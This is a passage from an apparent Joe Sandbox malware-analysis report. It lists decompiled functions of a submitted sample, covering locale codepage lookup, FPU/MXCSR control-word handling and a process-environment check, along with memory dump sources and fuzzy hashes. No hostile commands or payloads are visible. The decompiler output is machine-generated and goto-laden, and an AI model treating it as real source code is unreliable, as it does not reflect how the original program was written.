														_t212 = L"ACP";
														_t139 = _t247;
														while(1) {
															_t235 =  *_t139;
															if(_t235 !=  *_t212) {
																break;
															}
															if(_t235 == 0) {
																L68:
																_t140 = _t244;
															} else {
																_t238 =  *((intOrPtr*)(_t139 + 2));
																if(_t238 !=  *((intOrPtr*)(_t212 + 2))) {
																	break;
																} else {
																	_t139 = _t139 + 4;
																	_t212 = _t212 + 4;
																	if(_t238 != 0) {
																		continue;
																	} else {
																		goto L68;
																	}
																}
															}
															L70:
															if(_t140 == 0) {
																goto L87;
															} else {
																if(E00A0B1C4(_t244, _t247, _t247, L"utf8") == 0 || E00A0B1C4(_t244, _t247, _t247, L"utf-8") == 0) {
																	L84:
																	return 0xfde9;
																}
																_t217 = L"OCP";
																_t143 = _t247;
																while(1) {
																	_t236 =  *_t143;
																	if(_t236 !=  *_t217) {
																		break;
																	}
																	if(_t236 != 0) {
																		_t237 =  *((intOrPtr*)(_t143 + 2));
																		if(_t237 !=  *((intOrPtr*)(_t217 + 2))) {
																			break;
																		} else {
																			_t143 = _t143 + 4;
																			_t217 = _t217 + 4;
																			if(_t237 != 0) {
																				continue;
																			} else {
																			}
																		}
																	}
																	L80:
																	if(_t244 != 0) {
																		return E00A03DB9(_t217, _t247);
																	}
																	_push(2);
																	_push( &_v36);
																	_push(0x2000000b);
																	goto L82;
																}
																asm("sbb edi, edi");
																_t244 = _t244 | 0x00000001;
																goto L80;
															}
															goto L82;
														}
														asm("sbb eax, eax");
														_t140 = _t139 | 0x00000001;
														goto L70;
													}
												}
												L82:
												_push(_v20 + 0x250);
												if(E00A06539() == 0) {
													return 0;
												}
												_t137 = _v36;
												if(_t137 < 3) {
													goto L84;
												}
												return _t137;
											} else {
												 *(_t246 + 0x58) =  *(_t246 + 0x58) | 0x00000004;
												_pop(_t172);
												goto L58;
											}
										}
									} else {
										 *(_t246 + 0x58) =  *(_t246 + 0x58) & _t119;
										_t125 = _t119 + 1;
										L59:
										return E009F8F7D(_t125, _t172, _v32 ^ _t249, _t234, _t243, _t246);
									}
								} else {
									goto L15;
								}
							}
						} else {
							 *(_t245 + 0x58) =  *(_t245 + 0x58) & 0;
							L18:
							_t105 = 1;
							L48:
							_pop(_t171);
							goto L49;
						}
					}
				} else {
					 *(_t245 + 0x58) =  *(_t245 + 0x58) & _t97;
					_t105 = _t97 + 1;
					L49:
					return E009F8F7D(_t105, _t171, _v8 ^ _t248, _t234, _t242, _t245);
				}
			}







































































                                                                                                                                                                          0x00a0ddbe
                                                                                                                                                                          0x00a0ddbe
                                                                                                                                                                          0x00a0ddc9
                                                                                                                                                                          0x00a0ddd0
                                                                                                                                                                          0x00a0ddd5
                                                                                                                                                                          0x00a0dddd
                                                                                                                                                                          0x00a0dded
                                                                                                                                                                          0x00a0ddfd
                                                                                                                                                                          0x00a0de04
                                                                                                                                                                          0x00a0de0f
                                                                                                                                                                          0x00a0de1a
                                                                                                                                                                          0x00a0de1f
                                                                                                                                                                          0x00a0de21
                                                                                                                                                                          0x00a0de2b
                                                                                                                                                                          0x00a0deee
                                                                                                                                                                          0x00a0defa
                                                                                                                                                                          0x00a0e075
                                                                                                                                                                          0x00a0e07d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df00
                                                                                                                                                                          0x00a0df0d
                                                                                                                                                                          0x00a0df25
                                                                                                                                                                          0x00a0df6f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df75
                                                                                                                                                                          0x00a0df78
                                                                                                                                                                          0x00a0df7e
                                                                                                                                                                          0x00a0df84
                                                                                                                                                                          0x00a0dfba
                                                                                                                                                                          0x00a0e035
                                                                                                                                                                          0x00a0e03b
                                                                                                                                                                          0x00a0e03b
                                                                                                                                                                          0x00a0e041
                                                                                                                                                                          0x00a0e047
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e049
                                                                                                                                                                          0x00a0e049
                                                                                                                                                                          0x00a0e04b
                                                                                                                                                                          0x00a0e04e
                                                                                                                                                                          0x00a0e04e
                                                                                                                                                                          0x00a0e051
                                                                                                                                                                          0x00a0e054
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e04e
                                                                                                                                                                          0x00a0dfbc
                                                                                                                                                                          0x00a0dfbc
                                                                                                                                                                          0x00a0dfbf
                                                                                                                                                                          0x00a0dfc2
                                                                                                                                                                          0x00a0dfc2
                                                                                                                                                                          0x00a0dfc5
                                                                                                                                                                          0x00a0dfc8
                                                                                                                                                                          0x00a0dfd3
                                                                                                                                                                          0x00a0dfd8
                                                                                                                                                                          0x00a0e033
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0dfda
                                                                                                                                                                          0x00a0dfe3
                                                                                                                                                                          0x00a0e009
                                                                                                                                                                          0x00a0e009
                                                                                                                                                                          0x00a0e010
                                                                                                                                                                          0x00a0e010
                                                                                                                                                                          0x00a0e01b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e01d
                                                                                                                                                                          0x00a0e01d
                                                                                                                                                                          0x00a0e01f
                                                                                                                                                                          0x00a0e022
                                                                                                                                                                          0x00a0e022
                                                                                                                                                                          0x00a0e025
                                                                                                                                                                          0x00a0e028
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e031
                                                                                                                                                                          0x00a0dfe5
                                                                                                                                                                          0x00a0dfe5
                                                                                                                                                                          0x00a0dfe8
                                                                                                                                                                          0x00a0dfea
                                                                                                                                                                          0x00a0dfed
                                                                                                                                                                          0x00a0dfed
                                                                                                                                                                          0x00a0dff0
                                                                                                                                                                          0x00a0dff3
                                                                                                                                                                          0x00a0e007
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e007
                                                                                                                                                                          0x00a0dfe3
                                                                                                                                                                          0x00a0dfd8
                                                                                                                                                                          0x00a0df86
                                                                                                                                                                          0x00a0df8c
                                                                                                                                                                          0x00a0df8c
                                                                                                                                                                          0x00a0df92
                                                                                                                                                                          0x00a0df98
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df9e
                                                                                                                                                                          0x00a0df9e
                                                                                                                                                                          0x00a0dfa0
                                                                                                                                                                          0x00a0dfa3
                                                                                                                                                                          0x00a0dfa3
                                                                                                                                                                          0x00a0dfa6
                                                                                                                                                                          0x00a0dfa9
                                                                                                                                                                          0x00a0e05d
                                                                                                                                                                          0x00a0e05f
                                                                                                                                                                          0x00a0e064
                                                                                                                                                                          0x00a0e069
                                                                                                                                                                          0x00a0e06e
                                                                                                                                                                          0x00a0e073
                                                                                                                                                                          0x00a0e091
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e073
                                                                                                                                                                          0x00a0df98
                                                                                                                                                                          0x00a0df84
                                                                                                                                                                          0x00a0df27
                                                                                                                                                                          0x00a0df27
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df27
                                                                                                                                                                          0x00a0df25
                                                                                                                                                                          0x00a0de31
                                                                                                                                                                          0x00a0de3f
                                                                                                                                                                          0x00a0de54
                                                                                                                                                                          0x00a0de68
                                                                                                                                                                          0x00a0de6f
                                                                                                                                                                          0x00a0de74
                                                                                                                                                                          0x00a0de94
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0de96
                                                                                                                                                                          0x00a0de99
                                                                                                                                                                          0x00a0df32
                                                                                                                                                                          0x00a0df36
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df43
                                                                                                                                                                          0x00a0df43
                                                                                                                                                                          0x00a0df47
                                                                                                                                                                          0x00a0df49
                                                                                                                                                                          0x00a0df4c
                                                                                                                                                                          0x00a0df4c
                                                                                                                                                                          0x00a0df4f
                                                                                                                                                                          0x00a0df52
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0df57
                                                                                                                                                                          0x00a0de9f
                                                                                                                                                                          0x00a0deac
                                                                                                                                                                          0x00a0deb1
                                                                                                                                                                          0x00a0deb6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0deb8
                                                                                                                                                                          0x00a0deb8
                                                                                                                                                                          0x00a0debc
                                                                                                                                                                          0x00a0debe
                                                                                                                                                                          0x00a0dec1
                                                                                                                                                                          0x00a0dec1
                                                                                                                                                                          0x00a0dec4
                                                                                                                                                                          0x00a0dec7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0dec1
                                                                                                                                                                          0x00a0deb6
                                                                                                                                                                          0x00a0de99
                                                                                                                                                                          0x00a0de76
                                                                                                                                                                          0x00a0de7c
                                                                                                                                                                          0x00a0de7f
                                                                                                                                                                          0x00a0de81
                                                                                                                                                                          0x00a0de84
                                                                                                                                                                          0x00a0de84
                                                                                                                                                                          0x00a0de87
                                                                                                                                                                          0x00a0de8a
                                                                                                                                                                          0x00a0decc
                                                                                                                                                                          0x00a0dece
                                                                                                                                                                          0x00a0ded3
                                                                                                                                                                          0x00a0ded5
                                                                                                                                                                          0x00a0dede
                                                                                                                                                                          0x00a0dee3
                                                                                                                                                                          0x00a0dee8
                                                                                                                                                                          0x00a0e093
                                                                                                                                                                          0x00a0e093
                                                                                                                                                                          0x00a0e094
                                                                                                                                                                          0x00a0e095
                                                                                                                                                                          0x00a0e096
                                                                                                                                                                          0x00a0e097
                                                                                                                                                                          0x00a0e098
                                                                                                                                                                          0x00a0e09d
                                                                                                                                                                          0x00a0e0a0
                                                                                                                                                                          0x00a0e0a1
                                                                                                                                                                          0x00a0e0a9
                                                                                                                                                                          0x00a0e0b0
                                                                                                                                                                          0x00a0e0b3
                                                                                                                                                                          0x00a0e0b4
                                                                                                                                                                          0x00a0e0b5
                                                                                                                                                                          0x00a0e0bd
                                                                                                                                                                          0x00a0e0cd
                                                                                                                                                                          0x00a0e0dd
                                                                                                                                                                          0x00a0e0e4
                                                                                                                                                                          0x00a0e0ff
                                                                                                                                                                          0x00a0e137
                                                                                                                                                                          0x00a0e13f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e101
                                                                                                                                                                          0x00a0e101
                                                                                                                                                                          0x00a0e103
                                                                                                                                                                          0x00a0e106
                                                                                                                                                                          0x00a0e109
                                                                                                                                                                          0x00a0e109
                                                                                                                                                                          0x00a0e10c
                                                                                                                                                                          0x00a0e10f
                                                                                                                                                                          0x00a0e116
                                                                                                                                                                          0x00a0e11b
                                                                                                                                                                          0x00a0e11d
                                                                                                                                                                          0x00a0e130
                                                                                                                                                                          0x00a0e152
                                                                                                                                                                          0x00a0e153
                                                                                                                                                                          0x00a0e154
                                                                                                                                                                          0x00a0e155
                                                                                                                                                                          0x00a0e156
                                                                                                                                                                          0x00a0e157
                                                                                                                                                                          0x00a0e15c
                                                                                                                                                                          0x00a0e15f
                                                                                                                                                                          0x00a0e162
                                                                                                                                                                          0x00a0e163
                                                                                                                                                                          0x00a0e164
                                                                                                                                                                          0x00a0e167
                                                                                                                                                                          0x00a0e16a
                                                                                                                                                                          0x00a0e242
                                                                                                                                                                          0x00a0e242
                                                                                                                                                                          0x00a0e247
                                                                                                                                                                          0x00a0e248
                                                                                                                                                                          0x00a0e170
                                                                                                                                                                          0x00a0e170
                                                                                                                                                                          0x00a0e175
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e17b
                                                                                                                                                                          0x00a0e17b
                                                                                                                                                                          0x00a0e180
                                                                                                                                                                          0x00a0e182
                                                                                                                                                                          0x00a0e182
                                                                                                                                                                          0x00a0e188
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e18d
                                                                                                                                                                          0x00a0e1a4
                                                                                                                                                                          0x00a0e1a4
                                                                                                                                                                          0x00a0e18f
                                                                                                                                                                          0x00a0e18f
                                                                                                                                                                          0x00a0e197
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e199
                                                                                                                                                                          0x00a0e199
                                                                                                                                                                          0x00a0e19c
                                                                                                                                                                          0x00a0e1a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1a2
                                                                                                                                                                          0x00a0e197
                                                                                                                                                                          0x00a0e1ad
                                                                                                                                                                          0x00a0e1af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1b5
                                                                                                                                                                          0x00a0e1c4
                                                                                                                                                                          0x00a0e230
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e230
                                                                                                                                                                          0x00a0e1d7
                                                                                                                                                                          0x00a0e1dc
                                                                                                                                                                          0x00a0e1de
                                                                                                                                                                          0x00a0e1de
                                                                                                                                                                          0x00a0e1e4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1e9
                                                                                                                                                                          0x00a0e1eb
                                                                                                                                                                          0x00a0e1f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1f5
                                                                                                                                                                          0x00a0e1f5
                                                                                                                                                                          0x00a0e1f8
                                                                                                                                                                          0x00a0e1fe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e200
                                                                                                                                                                          0x00a0e1fe
                                                                                                                                                                          0x00a0e1f3
                                                                                                                                                                          0x00a0e207
                                                                                                                                                                          0x00a0e209
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e23f
                                                                                                                                                                          0x00a0e20b
                                                                                                                                                                          0x00a0e210
                                                                                                                                                                          0x00a0e211
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e211
                                                                                                                                                                          0x00a0e202
                                                                                                                                                                          0x00a0e204
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e204
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1af
                                                                                                                                                                          0x00a0e1a8
                                                                                                                                                                          0x00a0e1aa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e1aa
                                                                                                                                                                          0x00a0e175
                                                                                                                                                                          0x00a0e216
                                                                                                                                                                          0x00a0e21e
                                                                                                                                                                          0x00a0e226
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e24f
                                                                                                                                                                          0x00a0e228
                                                                                                                                                                          0x00a0e22e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e238
                                                                                                                                                                          0x00a0e132
                                                                                                                                                                          0x00a0e132
                                                                                                                                                                          0x00a0e136
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e136
                                                                                                                                                                          0x00a0e130
                                                                                                                                                                          0x00a0e0e6
                                                                                                                                                                          0x00a0e0e6
                                                                                                                                                                          0x00a0e0e9
                                                                                                                                                                          0x00a0e142
                                                                                                                                                                          0x00a0e14f
                                                                                                                                                                          0x00a0e14f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0dee8
                                                                                                                                                                          0x00a0de56
                                                                                                                                                                          0x00a0de56
                                                                                                                                                                          0x00a0df2a
                                                                                                                                                                          0x00a0df2c
                                                                                                                                                                          0x00a0e080
                                                                                                                                                                          0x00a0e080
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0e080
                                                                                                                                                                          0x00a0de54
                                                                                                                                                                          0x00a0de06
                                                                                                                                                                          0x00a0de06
                                                                                                                                                                          0x00a0de09
                                                                                                                                                                          0x00a0e081
                                                                                                                                                                          0x00a0e08e
                                                                                                                                                                          0x00a0e08e

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4283097504-0
                                                                                                                                                                          • Opcode ID: 99692731cbd3b7504fb6f1e9377c895f2495a58660e6fb1e64686b867a17e171
                                                                                                                                                                          • Instruction ID: 2017a0a2b1e5216fbb1a85bc7eeebba42f924f00414f65124175e2e92f8e9098
                                                                                                                                                                          • Opcode Fuzzy Hash: 99692731cbd3b7504fb6f1e9377c895f2495a58660e6fb1e64686b867a17e171
                                                                                                                                                                          • Instruction Fuzzy Hash: AAB12A7650070A9BDB34DF64DD92BB7B3A8EF54308F14492DE983C65C0EAB5E981D710
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A115A3 Relevance: .1, Instructions: 104COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E00A115A3(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0xa45e64 - 1; // 0x6
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}













                                                                                                                                                                          0x00a115ae
                                                                                                                                                                          0x00a115b6
                                                                                                                                                                          0x00a1160e
                                                                                                                                                                          0x00a1160f
                                                                                                                                                                          0x00a11611
                                                                                                                                                                          0x00a11620
                                                                                                                                                                          0x00a11623
                                                                                                                                                                          0x00a11629
                                                                                                                                                                          0x00a11673
                                                                                                                                                                          0x00a11676
                                                                                                                                                                          0x00a11678
                                                                                                                                                                          0x00a11680
                                                                                                                                                                          0x00a11682
                                                                                                                                                                          0x00a1168f
                                                                                                                                                                          0x00a11691
                                                                                                                                                                          0x00a11694
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a11694
                                                                                                                                                                          0x00a11699

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c09e2b48560c63d79db4b846f6d8da72b897b9d6cfda36669fa7a8931269ada1
                                                                                                                                                                          • Instruction ID: 4fc1c713ca352de1fc0638da80afe9f83534fb0664c35c2d8133ad06094e61d6
                                                                                                                                                                          • Opcode Fuzzy Hash: c09e2b48560c63d79db4b846f6d8da72b897b9d6cfda36669fa7a8931269ada1
                                                                                                                                                                          • Instruction Fuzzy Hash: 9721B673F205394B770CC47E8C532BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A11483 Relevance: .1, Instructions: 81COMMONCrypto
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E00A11483(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0xa45e64 - 1; // 0x6
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}








                                                                                                                                                                          0x00a1148e
                                                                                                                                                                          0x00a11492
                                                                                                                                                                          0x00a114d7
                                                                                                                                                                          0x00a114d9
                                                                                                                                                                          0x00a114df
                                                                                                                                                                          0x00a114e5
                                                                                                                                                                          0x00a114ec
                                                                                                                                                                          0x00a114e1
                                                                                                                                                                          0x00a114e1
                                                                                                                                                                          0x00a114e1
                                                                                                                                                                          0x00a1153a

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ef0a849238496d45f21d3234ef5cf3892e481a801807a519527cac12cbffa0b
                                                                                                                                                                          • Instruction ID: bfde2f4255bd53bc1742f53a002088efa0daca5b1f27241fa9801733eea21cca
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ef0a849238496d45f21d3234ef5cf3892e481a801807a519527cac12cbffa0b
                                                                                                                                                                          • Instruction Fuzzy Hash: 8711CA73F30C255B675C81BD8C132BA91D2DBD824030F433AD826EB284E8A4DE13D290
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A2214C Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                          • Instruction ID: 7c98b7507501697a8be596d650f4980fb2ae21fd2b3661aff22195682653ef88
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
                                                                                                                                                                          • Instruction Fuzzy Hash: 80E04F32210520ABC7219F5DE940E96F7E8EB947B07454575EA4997621D330FC21D790
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0C8CA Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0C8CA(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00A0632A(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                                                                                                                                                          0x00a0c8d7
                                                                                                                                                                          0x00a0c8d9
                                                                                                                                                                          0x00a0c8dc
                                                                                                                                                                          0x00a0c8df
                                                                                                                                                                          0x00a0c8e2
                                                                                                                                                                          0x00a0c8f3
                                                                                                                                                                          0x00a0c8f5
                                                                                                                                                                          0x00a0c8e4
                                                                                                                                                                          0x00a0c8e8
                                                                                                                                                                          0x00a0c8f1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c8f1
                                                                                                                                                                          0x00a0c8fa

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a5723d95812905f6a1b6f5161af862748f6307f263e14757bb905799d683a281
